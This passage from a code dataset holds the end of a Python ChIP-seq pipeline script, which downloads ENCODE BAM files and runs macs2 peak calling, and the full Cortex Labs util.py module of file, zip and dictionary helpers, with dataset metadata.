update_to(self, b=1, bsize=1, tsize=None):\n if tsize is not None:\n self.total = tsize\n self.update(b * bsize - self.n)\n\ndef download_url(url, output_path):\n with DownloadProgressBar(unit='B', unit_scale=True,\n miniters=1, desc=url.split('/')[-1]) as t:\n try: \n urllib.request.urlretrieve(url, filename=output_path, reporthook=t.update_to)\n return 0\n except urllib.error.HTTPError:\n return -1\n\n\ndef get_file_info(filename):\n file_info = defaultdict(dict)\n with open(filename, \"r\") as f:\n next(f)\n for line in f.readlines():\n if line.rstrip() != \"\" and not line.startswith(\"#\"):\n items = line.strip().split() # split on space and tab\n exp_id, chip_name, rep_tag, file_id, quality, output_type, antibody_id = \\\n items[0], items[1], items[2], items[3], items[4], items[5], items[6]\n if rep_tag.startswith(\"r\"):\n chip_name = chip_name + \"_\" + exp_id \n else:\n corresponding_chip = items[7]\n chip_name = chip_name + \"_\"+ corresponding_chip\n full_tag = rep_tag + \"_\" + output_type\n file_info[chip_name][full_tag] = file_id\n return file_info\n\n\ndef download_chip(file_info, input_dir):\n\n filtered_file = configparser.ConfigParser()\n unfiltered_file = configparser.ConfigParser()\n outdir = \"../result/chipseq\"\n timestamp = \"\"\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n\n for chipname, tag_fileID in file_info.items():\n chip_path = \"%s/%s\" % (outdir, chipname)\n if not os.path.exists(chip_path):\n os.makedirs(chip_path)\n timestamp += chipname +\"\\n\"\n unfiltered, filtered = OrderedDict(), OrderedDict()\n for tag, file_id in tag_fileID.items():\n fname = file_id + \".bam\"\n saveto = \"%s/%s\" % (chip_path, fname)\n if not os.path.exists(saveto): \n chipurl = \"https://www.encodeproject.org/files/{0}/@@download/{0}.bam\".format(file_id) \n #print(\"Downloading %s ...\" % (fname))\n status = download_url(chipurl, saveto) # takes filename?!\n if status == -1:\n not_download_msg = \"%s was NOT downloaded due to a URL error.\" % fname\n timestamp += \"\\t\"+not_download_msg +\"\\n\"\n print(not_download_msg)\n continue\n else:\n now = datetime.datetime.now()\n timestamp += \"\\tDownloaded %s on %s at %s \\n\" % (fname, now.strftime(\"%Y-%m-%d\"), now.strftime(\"%H:%M:%S\"))\n print(\"Finished downloading %s\" % fname)\n else: # if file already existed\n skip_msg = \"%s already existed. Skipped downloading the file.\" % fname\n timestamp += \"\\t\"+ skip_msg +\"\\n\"\n print(skip_msg)\n\n # add to config dictionary\n if \"unfiltered\" in tag:\n unfiltered[tag.split(\"_\")[0]] = fname\n else:\n filtered[tag.split(\"_\")[0]] = fname\n\n if len(filtered)!=0:\n filtered_file[chipname] = filtered\n if len(unfiltered)!=0:\n unfiltered_file[chipname] = unfiltered\n\n with open(\"../result/chipseq/download_timestamp.txt\", 'w') as f:\n f.write(timestamp)\n with open(input_dir + 'chips_unfiltered.config', 'w') as configfile:\n # for call_peaks() to use later\n unfiltered_file.write(configfile)\n with open(input_dir + 'chips_filtered.config', 'w') as configfile:\n filtered_file.write(configfile)\n \n# trying to test fork\n\ndef remove_inner_list(nested_list):\n flat_list = []\n for item in nested_list:\n if isinstance(item, list):\n for i in item:\n flat_list.append(i)\n else:\n flat_list.append(item)\n return flat_list\n\n\ndef call_peaks(chipname, saved_chip_paths, macs_args):\n #outdir = \"../result/%s\" % chipname\n #macs_result_path = \"%s/macs_result/%s\" % (outdir, chipname)\n macs_result_path = \"../result/%s/macs_result\" % (chipname)\n if not os.path.exists(macs_result_path):\n os.makedirs(macs_result_path)\n print(\"Running macs...\")\n \n reps, cntrl = [0]*2, []\n for chip_id, chip_path in saved_chip_paths.items(): \n if chip_id == \"r1\":\n reps[0] = chip_path\n elif chip_id == \"r2\":\n reps[1] = chip_path\n elif chip_id.startswith(\"c\"):\n cntrl.append(chip_path)\n #else:\n # throw exception/warning\n all_rep = [[r] for r in reps]\n all_rep.append(reps) # [[r1], [r2], [r1, r2]]\n tagsize, macs_p = macs_args[0], macs_args[1]\n for indx, rep in enumerate(all_rep):\n output_file = (macs_result_path +\"/\"+ chipname + \"_both\") if len(rep)==2 else (macs_result_path +\"/\"+ chipname + \"_r\" + str(indx+1))\n args = [\"macs2 callpeak\", \"-t\", 0, \"-c\", 0, \"-n\", 0, \"-s\", 0, \"-p\", 0, \"-f BAM -g hs -B\"] # don't need shell script anymore\n args[2], args[4], args[6], args[8], args[10] = rep, cntrl, output_file, tagsize, macs_p\n arg_list = remove_inner_list(args)\n arg_str_list = [str(item) for item in arg_list]\n command = ' '.join(arg_str_list).split()\n \n subprocess.call(command,shell=False)\n\n print(\"Finished running macs for %s, results are saved in %s\" % (chipname, macs_result_path))\n\n\n\n # ----\n \n\n # analysis_result_path = \"%s/analysis_result\" % (outdir)\n # if not os.path.exists(analysis_result_path):\n # os.makedirs(analysis_result_path)\n # print(\"Running analysis...\")\n # pwd = os.path.dirname(os.path.realpath(__file__))\n # pu1_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_r1_treat_pileup.bdg\")\n # pu2_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_r2_treat_pileup.bdg\")\n # pu_both_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_bothrs_treat_pileup.bdg\")\n # nrwp_preidr_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_bothrs_peaks.narrowPeak\")\n # nrwp_postidr_path = \"%s/%s\" % (idr_result_path,\"idr_001p_wlist.005i\")\n # args_rscript = [pu1_path, pu2_path, pu_both_path, nrwp_preidr_path, nrwp_postidr_path, bedpath, analysis_result_path, chipname]\n # #subprocess.call([\"srun\",\"Rscript\",\"R_analysis/main.R\",pwd] + args_rscript,shell=False)\n # #subprocess.call([\"Rscript\",\"R_analysis/main.R\",pwd] + args_rscript,shell=False)\n\n\n\n'''\nNote: put all inputs in the input dir\nEnforce: \n- pipeline.config \n\nIf skipped downloadchip:\n- chip_path.config\n\n'''\n\ndef main():\n input_dir = \"../input/\"\n config_pipeline = configparser.ConfigParser()\n config_pipeline.read(input_dir + \"pipeline.config\") \n # NOTE: set defaults in pipline, in case users don't follow the template\n \n if(config_pipeline['pipeline'].getboolean('downloadchip')):\n filename = config_pipeline['downloadchip_param']['chip_to_download']\n file = os.path.join(input_dir, filename)\n file_info = get_file_info(file)\n download_chip(file_info, input_dir)\n print(\"Finished downloading all files :)\")\n else:\n print(\"Skipping downloadchip!\")\n\n \n if(config_pipeline['pipeline'].getboolean('callpeaks')):\n macs_args = (config_pipeline['callpeaks_param']['tagsize'], config_pipeline['callpeaks_param']['macs_p'])\n config_chippath = configparser.ConfigParser()\n config_chippath.read(\"chip_path.config\") # enforce filename and format\n for chipname, saved_chip_path in config_chippath.items():\n if(chipname!=\"DEFAULT\"):\n chip_paths = config_chippath[chipname]\n call_peaks(chipname, chip_paths, macs_args)\n print(\"Finished calling all peaks.\")\n else: \n print(\"Skipping callpeaks!\")\n\n\n \n \n \n\nif __name__==\"__main__\":\n\n main()\n \n\n \n\n'''\n\n \n subprocess.call([\"srun\",\"macs2.sh\",chipdata[\"r1\"],chipdata[\"r2\"],chipdata[\"c1\"],chipdata[\"c2\"],\"%s/%s\" % (macs_result_path,chipname), str(tagsize)],shell=False)\n #subprocess.call([\"./macs2.sh\",chipdata[\"r1\"],chipdata[\"r2\"],chipdata[\"c1\"],chipdata[\"c2\"],\"%s/%s\" % (macs_result_path,chipname), str(tagsize)],shell=False)\n print(\"Finished running macs, results are saved in %s\" % macs_result_path)\n\n idr_result_path = \"%s/idr_result\" % (outdir)\n if not os.path.exists(idr_result_path):\n os.makedirs(idr_result_path)\n print(\"Running idrs...\")\n #subprocess.call([\"srun\",\"idr.sh\",\"%s/%s\" % (macs_result_path,chipname),idr_result_path],shell=False)\n #subprocess.call([\"./idr.sh\",\"%s/%s\" % (macs_result_path,chipname),idr_result_path],shell=False)\n\n\n analysis_result_path = \"%s/analysis_result\" % (outdir)\n if not os.path.exists(analysis_result_path):\n os.makedirs(analysis_result_path)\n print(\"Running analysis...\")\n pwd = os.path.dirname(os.path.realpath(__file__))\n pu1_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_r1_treat_pileup.bdg\")\n pu2_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_r2_treat_pileup.bdg\")\n pu_both_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_bothrs_treat_pileup.bdg\")\n nrwp_preidr_path = \"%s/%s%s\" % (macs_result_path,chipname,\"_bothrs_peaks.narrowPeak\")\n nrwp_postidr_path = \"%s/%s\" % (idr_result_path,\"idr_001p_wlist.005i\")\n args_rscript = [pu1_path, pu2_path, pu_both_path, nrwp_preidr_path, nrwp_postidr_path, bedpath, analysis_result_path, chipname]\n #subprocess.call([\"srun\",\"Rscript\",\"R_analysis/main.R\",pwd] + args_rscript,shell=False)\n #subprocess.call([\"Rscript\",\"R_analysis/main.R\",pwd] + args_rscript,shell=False)\n\n # ============== PLOT AND FILTERING PART ==============\n\n # First, we can just load the models to avoid having to reload this on every iteration\n models = [iMADSModel(modelpath, modelcore, modelwidth, model_kmers) for modelpath, modelcore in zip(modelpaths, modelcores)]\n imads = iMADS(models, imads_cutoff) # 0.2128 is for the ETS1 cutoff\n\n escore = PBMEscore(escore_short_path, escore_map_path)\n\n sitelist_path = \"%s/%s\" % (analysis_result_path, \"sitefiles_list.txt\")\n with open(sitelist_path, 'r') as f:\n sitelist = [line.strip() for line in f.readlines()]\n for sitefile in sitelist:\n filename = os.path.basename(os.path.splitext(sitefile)[0])\n print(\"Making sites plot for %s\" % filename)\n seqdf = pd.read_csv(sitefile, sep='\\t')\n\n # Make Escore object\n es_preds = escore.predict_sequences(seqdf)\n eplots = escore.plot(es_preds)\n # Make iMADS plot\n imads_preds = imads.predict_sequences(seqdf)\n imadsplots = imads.plot(imads_preds)\n plots = [imadsplots, eplots]\n\n pc = PlotCombiner() # can do this just once but not a big deal\n plotpath = \"%s/sitesplot_%s.pdf\" % (analysis_result_path, filename)\n pc.plot_seq_combine(plots, filepath=plotpath)\n\n filtered_sites = {}\n print(\"Site filtering...\")\n for key in es_preds:\n es_pred1 = es_preds[key]\n imads_pred1 = imads_preds[key]\n bs = BindingSites(imads_pred1,es_pred1)\n if bs.site_count() == 2:\n filtered_sites[key] = bs\n site_list = [{**{\"key\":site, \"sequence\":es_preds[site].sequence},**filtered_sites[site].get_sites_dict()} for site in filtered_sites]\n columns = [\"key\", \"site_start_1\", \"site_start_2\", \"site_end_1\", \"site_end_2\", \"site_pos_1\", \"site_pos_2\", \"imads_score_1\", \"imads_score_2\", \"sequence\"]\n pd.DataFrame(site_list).to_csv(dfpath, index=False, columns=columns, float_format='%.4f')\n\n print(\"Done\")\n'''", "sub_path": "src/chip2probe.py", "file_name": "chip2probe.py", "file_ext": "py", "file_size_in_byte": 13502, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.path.append", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 56, "usage_type": "name"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 66, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 66, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 66, "usage_type": "name"}, {"api_name": "urllib.request.error", "line_number": 68, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 68, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 73, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 93, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 103, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 119, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path", "line_number": 163, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 164, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 188, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 241, "usage_type": "call"}]} +{"seq_id": "387581814", "text": "# Copyright 2020 Cortex Labs, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport errno\nimport shutil\nimport stat\nimport pickle\nimport json\nimport collections\nimport tempfile\nimport zipfile\nimport hashlib\nimport msgpack\nimport pathlib\nimport inspect\nfrom inspect import Parameter\n\nfrom copy import deepcopy\nfrom datetime import datetime\n\nfrom cortex.lib import stringify\nimport json_tricks\n\n\ndef isclose(a, b, rel_tol=1e-09, abs_tol=0.0):\n return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)\n\n\ndef json_tricks_encoder(*args, **kwargs):\n kwargs[\"primitives\"] = True\n kwargs[\"obj_encoders\"] = json_tricks.nonp.DEFAULT_ENCODERS\n params = list(inspect.signature(json_tricks.TricksEncoder).parameters.values())\n params += list(inspect.signature(json.JSONEncoder).parameters.values())\n expected_keys = set()\n for param in params:\n if param.kind == Parameter.POSITIONAL_OR_KEYWORD or param.kind == Parameter.KEYWORD_ONLY:\n expected_keys.add(param.name)\n\n for key in list(kwargs.keys()):\n if key not in expected_keys:\n kwargs.pop(key)\n\n return json_tricks.TricksEncoder(*args, **kwargs)\n\n\ndef pluralize(num, singular, plural):\n if num == 1:\n return str(num) + \" \" + singular\n else:\n return str(num) + \" \" + plural\n\n\ndef snake_to_camel(input, sep=\"_\", lower=True):\n output = \"\"\n for idx, word in enumerate(input.lower().split(sep)):\n if idx == 0 and lower:\n output += word\n else:\n output += word[0].upper() + word[1:]\n return output\n\n\ndef mkdir_p(dir_path):\n pathlib.Path(dir_path).mkdir(parents=True, exist_ok=True)\n\n\ndef rm_dir(dir_path):\n if os.path.isdir(dir_path):\n shutil.rmtree(dir_path)\n return True\n return False\n\n\ndef rm_file(path):\n if os.path.isfile(path):\n os.remove(path)\n return True\n return False\n\n\ndef list_files_recursive(dir_path, ignore=None):\n all_file_names = []\n for root, _, file_names in os.walk(dir_path):\n if ignore:\n file_names = set(file_names) - ignore(root, file_names)\n for file_name in file_names:\n all_file_names.append(os.path.join(root, file_name))\n return all_file_names\n\n\n# https://stackoverflow.com/questions/1868714/how-do-i-copy-an-entire-directory-of-files-into-an-existing-directory-using-pyth\ndef cp_dir(src, dst, symlinks=False, ignore=None):\n if not os.path.exists(dst):\n os.makedirs(dst)\n shutil.copystat(src, dst)\n lst = os.listdir(src)\n if ignore:\n excl = ignore(src, lst)\n lst = [x for x in lst if x not in excl]\n for item in lst:\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if symlinks and os.path.islink(s):\n if os.path.lexists(d):\n os.remove(d)\n os.symlink(os.readlink(s), d)\n try:\n st = os.lstat(s)\n mode = stat.S_IMODE(st.st_mode)\n os.lchmod(d, mode)\n except:\n pass # lchmod not available\n elif os.path.isdir(s):\n cp_dir(s, d, symlinks, ignore)\n else:\n shutil.copy2(s, d)\n\n\ntemp_files_ignore = shutil.ignore_patterns(\"*.pyc\", \".*\")\n\n\ndef non_code_ignore(path, names):\n good_patterns = [\"*.py\", \"*.yaml\", \"*.yml\"]\n good_names = []\n for pattern in good_patterns:\n good_names.extend(fnmatch.filter(names, pattern))\n dirs = [f for f in names if os.path.isdir(os.path.join(path, f))]\n return set(names) - set(good_names) - set(dirs)\n\n\ndef make_temp_dir(parent_dir=None, prefix=\"tmp-\", suffix=\"\"):\n return tempfile.mkdtemp(suffix=suffix, prefix=prefix, dir=parent_dir)\n\n\nclass Tempdir:\n def __init__(self, parent_dir=None, prefix=\"tmp-\", suffix=\"\"):\n self.parent_dir = parent_dir\n self.prefix = prefix\n self.suffix = suffix\n\n def __enter__(self):\n self.temp_dir = make_temp_dir(self.parent_dir, self.prefix, self.suffix)\n return self.temp_dir\n\n def __exit__(self, type, value, traceback):\n rm_dir(self.temp_dir)\n\n\ndef now_timestamp_rfc_3339():\n return datetime.utcnow().isoformat(\"T\") + \"Z\"\n\n\ndef trim_prefix(string, prefix):\n if string.startswith(prefix):\n return string[len(prefix) :]\n return string\n\n\ndef ensure_prefix(string, prefix):\n if string.startswith(prefix):\n return string\n return prefix + string\n\n\ndef trim_suffix(string, suffix):\n if string.endswith(suffix):\n return string[: -len(suffix)]\n return string\n\n\ndef ensure_suffix(string, suffix):\n if string.endswith(suffix):\n return string\n return string + suffix\n\n\ndef is_bool(var):\n return isinstance(var, bool)\n\n\ndef is_float(var):\n return isinstance(var, float)\n\n\ndef is_int(var):\n return isinstance(var, int) and not isinstance(var, bool)\n\n\ndef is_str(var):\n return isinstance(var, str)\n\n\ndef is_dict(var):\n return isinstance(var, dict)\n\n\ndef is_list(var):\n return isinstance(var, list)\n\n\ndef is_tuple(var):\n return isinstance(var, tuple)\n\n\ndef is_float_or_int(var):\n return is_int(var) or is_float(var)\n\n\ndef is_int_list(var):\n if not is_list(var):\n return False\n for item in var:\n if not is_int(item):\n return False\n return True\n\n\ndef is_float_list(var):\n if not is_list(var):\n return False\n for item in var:\n if not is_float(item):\n return False\n return True\n\n\ndef is_str_list(var):\n if not is_list(var):\n return False\n for item in var:\n if not is_str(item):\n return False\n return True\n\n\ndef is_bool_list(var):\n if not is_list(var):\n return False\n for item in var:\n if not is_bool(item):\n return False\n return True\n\n\ndef is_float_or_int_list(var):\n if not is_list(var):\n return False\n for item in var:\n if not is_float_or_int(item):\n return False\n return True\n\n\n# Note: this converts tuples to lists\ndef flatten(var):\n if is_list(var) or is_tuple(var):\n return [a for i in var for a in flatten(i)]\n else:\n return [var]\n\n\ndef create_multi_map(d, key_func):\n \"\"\"Create a dictionary that returns a list of values for a specific key.\n\n Args:\n d (dict): The dictionary to convert to multimap.\n key_func (callable): A callable that gets called with the key and value to create a new ID.\n\n Returns:\n type: A dict of lists.\n\n \"\"\"\n new_dict = {}\n for k, v in d.items():\n new_key = key_func(k, v)\n ls = new_dict.get(new_key, [])\n ls.append(v)\n new_dict[new_key] = ls\n return new_dict\n\n\ndef merge_dicts_in_place_overwrite(*dicts):\n \"\"\"Merge dicts, right into left, with overwriting. First dict is updated in place\"\"\"\n dicts = list(dicts)\n target = dicts.pop(0)\n for d in dicts:\n merge_two_dicts_in_place_overwrite(target, d)\n return target\n\n\ndef merge_dicts_in_place_no_overwrite(*dicts):\n \"\"\"Merge dicts, right into left, without overwriting. First dict is updated in place\"\"\"\n dicts = list(dicts)\n target = dicts.pop(0)\n for d in dicts:\n merge_two_dicts_in_place_no_overwrite(target, d)\n return target\n\n\ndef merge_dicts_overwrite(*dicts):\n \"\"\"Merge dicts, right into left, with overwriting. A new dict is created, original ones not modified.\"\"\"\n result = {}\n for d in dicts:\n result = merge_two_dicts_overwrite(result, d)\n return result\n\n\ndef merge_dicts_no_overwrite(*dicts):\n \"\"\"Merge dicts, right into left, without overwriting. A new dict is created, original ones not modified.\"\"\"\n result = {}\n for d in dicts:\n result = merge_two_dicts_no_overwrite(result, d)\n return result\n\n\ndef merge_two_dicts_in_place_overwrite(x, y):\n \"\"\"Merge y into x, with overwriting. x is updated in place\"\"\"\n if x is None:\n x = {}\n\n if y is None:\n y = {}\n\n for k, v in y.items():\n if k in x and isinstance(x[k], dict) and isinstance(y[k], collections.Mapping):\n merge_dicts_in_place_overwrite(x[k], y[k])\n else:\n x[k] = y[k]\n return x\n\n\ndef merge_two_dicts_in_place_no_overwrite(x, y):\n \"\"\"Merge y into x, without overwriting. x is updated in place\"\"\"\n for k, v in y.items():\n if k in x and isinstance(x[k], dict) and isinstance(y[k], collections.Mapping):\n merge_dicts_in_place_no_overwrite(x[k], y[k])\n else:\n if k not in x:\n x[k] = y[k]\n return x\n\n\ndef merge_two_dicts_overwrite(x, y):\n \"\"\"Merge y into x, with overwriting. A new dict is created, original ones not modified.\"\"\"\n x = deepcopy(x)\n return merge_dicts_in_place_overwrite(x, y)\n\n\ndef merge_two_dicts_no_overwrite(x, y):\n \"\"\"Merge y into x, without overwriting. A new dict is created, original ones not modified.\"\"\"\n y = deepcopy(y)\n return merge_dicts_in_place_overwrite(y, x)\n\n\ndef normalize_path(path, rel_dir):\n if os.path.isabs(path):\n return path\n else:\n return os.path.normpath(os.path.join(rel_dir, path))\n\n\ndef read_file(path):\n if not os.path.isfile(path):\n return None\n with open(path, \"r\") as file:\n return file.read()\n\n\ndef read_file_strip(path):\n contents = read_file(path)\n if is_str(contents):\n contents = contents.strip()\n return contents\n\n\ndef get_json(json_path):\n with open(json_path, \"r\") as json_file:\n return json.load(json_file)\n\n\ndef read_msgpack(msgpack_path):\n with open(msgpack_path, \"rb\") as msgpack_file:\n return msgpack.load(msgpack_file, raw=False)\n\n\ndef zip_dir(src_dir, dest_path, nest_dir=False, ignore=None):\n \"\"\"Note: files are added at the root level of the zip, unless nest_dir=True\"\"\"\n if nest_dir:\n root = os.path.basename(src_dir)\n else:\n root = \"\"\n\n return zip_dispersed_files(src_files=[(src_dir, root)], dest_path=dest_path, ignore=ignore)\n\n\ndef zip_files(\n src_files,\n dest_path,\n flatten=False,\n remove_common_prefix=False,\n remove_prefix=\"\",\n add_prefix=\"\",\n empty_files=[],\n ignore=None,\n allow_missing_files=False,\n):\n \"\"\"src_files is a list of strings (path_to_file/dir)\"\"\"\n dest_path = ensure_suffix(dest_path, \".zip\")\n add_prefix = trim_prefix(add_prefix, \"/\")\n\n if remove_prefix != \"\" and not remove_prefix.endswith(\"/\"):\n remove_prefix = remove_prefix + \"/\"\n\n common_prefix = \"\"\n if remove_common_prefix:\n common_prefix = os.path.commonprefix(src_files)\n\n src_dirs = [f for f in src_files if f and os.path.isdir(f)]\n src_files = [f for f in src_files if f and os.path.isfile(f)]\n for src_dir in src_dirs:\n src_files += list_files_recursive(src_dir, ignore=ignore)\n\n with zipfile.ZipFile(dest_path, \"w\", zipfile.ZIP_DEFLATED) as myzip:\n for empty_file_path in empty_files:\n empty_file_path = trim_prefix(empty_file_path, \"/\")\n myzip.writestr(empty_file_path, \"\")\n\n for src_file in src_files:\n if flatten:\n zip_name = os.path.basename(src_file)\n else:\n zip_name = src_file\n zip_name = trim_prefix(zip_name, remove_prefix)\n zip_name = trim_prefix(zip_name, common_prefix)\n\n zip_name = os.path.join(add_prefix, zip_name)\n if allow_missing_files:\n if os.path.isfile(src_file):\n myzip.write(src_file, arcname=zip_name)\n else:\n myzip.write(src_file, arcname=zip_name)\n\n\ndef zip_dispersed_files(\n src_files, dest_path, add_prefix=\"\", empty_files=[], ignore=None, allow_missing_files=False\n):\n \"\"\"src_files is a list of tuples (path_to_file/dir, path_in_zip)\"\"\"\n dest_path = ensure_suffix(dest_path, \".zip\")\n add_prefix = trim_prefix(add_prefix, \"/\")\n\n src_dirs = [(f, p) for f, p in src_files if f and os.path.isdir(f)]\n src_files = [(f, p) for f, p in src_files if f and os.path.isfile(f)]\n for src_dir, zip_name in src_dirs:\n for src_file in list_files_recursive(src_dir, ignore=ignore):\n common_prefix = os.path.commonprefix([src_dir, src_file])\n rel_src_file = trim_prefix(src_file, common_prefix)\n rel_src_file = trim_prefix(rel_src_file, \"/\")\n updated_zip_name = os.path.join(zip_name, rel_src_file)\n src_files.append((src_file, updated_zip_name))\n\n with zipfile.ZipFile(dest_path, \"w\", zipfile.ZIP_DEFLATED) as myzip:\n for empty_file_path in empty_files:\n empty_file_path = trim_prefix(empty_file_path, \"/\")\n myzip.writestr(empty_file_path, \"\")\n\n for src_file, zip_name in src_files:\n zip_name = trim_prefix(zip_name, \"/\")\n zip_name = os.path.join(add_prefix, zip_name)\n if allow_missing_files:\n if os.path.isfile(src_file):\n myzip.write(src_file, arcname=zip_name)\n else:\n myzip.write(src_file, arcname=zip_name)\n\n\ndef extract_zip(zip_path, dest_dir=None, delete_zip_file=False):\n if dest_dir is None:\n dest_dir = os.path.dirname(zip_path)\n\n zip_ref = zipfile.ZipFile(zip_path, \"r\")\n zip_ref.extractall(dest_dir)\n zip_ref.close()\n\n if delete_zip_file:\n rm_file(zip_path)\n\n\ndef max_len(strings):\n return max(len(s) for s in strings)\n\n\ndef pad_smart(string, width, is_number):\n if is_number:\n return pad_left(string, width)\n else:\n return pad_right(string, width)\n\n\ndef pad_right(string, width):\n return string.ljust(width)\n\n\ndef pad_left(string, width):\n return string.rjust(width)\n\n\ndef is_number_col(items):\n if all(item is None for item in items):\n return False\n\n for item in items:\n if not is_int(item) and not is_float(item) and item != None:\n return False\n\n return True\n\n\ndef has_function(impl, fn_name):\n fn = getattr(impl, fn_name, None)\n if fn is None:\n return False\n\n return callable(fn)\n", "sub_path": "pkg/workloads/cortex/lib/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 14520, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "json_tricks.nonp", "line_number": 43, "usage_type": "attribute"}, {"api_name": "inspect.signature", "line_number": 44, "usage_type": "call"}, {"api_name": "json_tricks.TricksEncoder", "line_number": 44, "usage_type": "attribute"}, {"api_name": "inspect.signature", "line_number": 45, "usage_type": "call"}, {"api_name": "json.JSONEncoder", "line_number": 45, "usage_type": "attribute"}, {"api_name": "inspect.Parameter.POSITIONAL_OR_KEYWORD", "line_number": 48, "usage_type": "attribute"}, {"api_name": "inspect.Parameter", "line_number": 48, "usage_type": "name"}, {"api_name": "inspect.Parameter.KEYWORD_ONLY", "line_number": 48, "usage_type": "attribute"}, {"api_name": "json_tricks.TricksEncoder", "line_number": 55, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 88, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 106, "usage_type": "call"}, {"api_name": "shutil.copystat", "line_number": 107, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.islink", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.path.lexists", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 117, "usage_type": "call"}, {"api_name": "os.symlink", "line_number": 118, "usage_type": "call"}, {"api_name": "os.readlink", "line_number": 118, "usage_type": "call"}, {"api_name": "os.lstat", "line_number": 120, "usage_type": "call"}, {"api_name": "stat.S_IMODE", "line_number": 121, "usage_type": "call"}, {"api_name": "os.lchmod", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 128, "usage_type": "call"}, {"api_name": "shutil.ignore_patterns", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 144, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 162, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 162, "usage_type": "name"}, {"api_name": "collections.Mapping", "line_number": 337, "usage_type": "attribute"}, {"api_name": "collections.Mapping", "line_number": 347, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 357, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 363, "usage_type": "call"}, {"api_name": "os.path.isabs", "line_number": 368, "usage_type": "call"}, {"api_name": "os.path", "line_number": 368, "usage_type": "attribute"}, {"api_name": "os.path.normpath", "line_number": 371, 